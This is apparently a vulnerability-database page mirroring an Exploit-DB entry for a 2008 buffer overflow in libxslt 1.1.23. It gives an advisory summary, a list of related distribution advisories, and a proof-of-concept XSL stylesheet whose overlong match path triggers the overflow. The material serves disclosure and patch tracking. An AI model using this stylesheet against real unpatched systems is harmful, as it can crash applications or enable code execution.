libxslt XSL 1.1.23 - File Processing Buffer Overflow
🗓️ 21 May 2008 00:00:00Reported by Anthony de Almeida LopesType
exploitdb🔗 www.exploit-db.com👁 38 Views
| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
| Safari < 3.2 Multiple Vulnerabilities | 14 Nov 200800:00 | – | nessus | |
| CentOS 3 / 4 / 5 : libxslt (CESA-2008:0287) | 22 May 200800:00 | – | nessus | |
| Debian DSA-1589-1 : libxslt - buffer overflow | 29 May 200800:00 | – | nessus | |
| GLSA-200806-02 : libxslt: Execution of arbitrary code | 4 Jun 200800:00 | – | nessus | |
| Mac OS X : Apple Safari < 3.2 | 14 Nov 200800:00 | – | nessus | |
| Mac OS X Multiple Vulnerabilities (Security Update 2008-007) | 10 Oct 200800:00 | – | nessus | |
| Mandriva Linux Security Advisory : libxslt (MDVSA-2008:151) | 23 Apr 200900:00 | – | nessus | |
| Oracle Linux 5 : libxslt (ELSA-2008-0287) | 12 Jul 201300:00 | – | nessus | |
| RHEL 2.1 / 3 / 4 / 5 : libxslt (RHSA-2008:0287) | 22 May 200800:00 | – | nessus | |
| Safari < 3.2 Multiple Vulnerabilities | 14 Nov 200800:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/29312/info
The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects libxslt 1.1.23 and prior versions.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>
<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
<xsl:if test="contains(text(), 'published')">
<found/>
</xsl:if>
</xsl:template>
</xsl:stylesheet>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Feb 2014 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
EPSS0.1279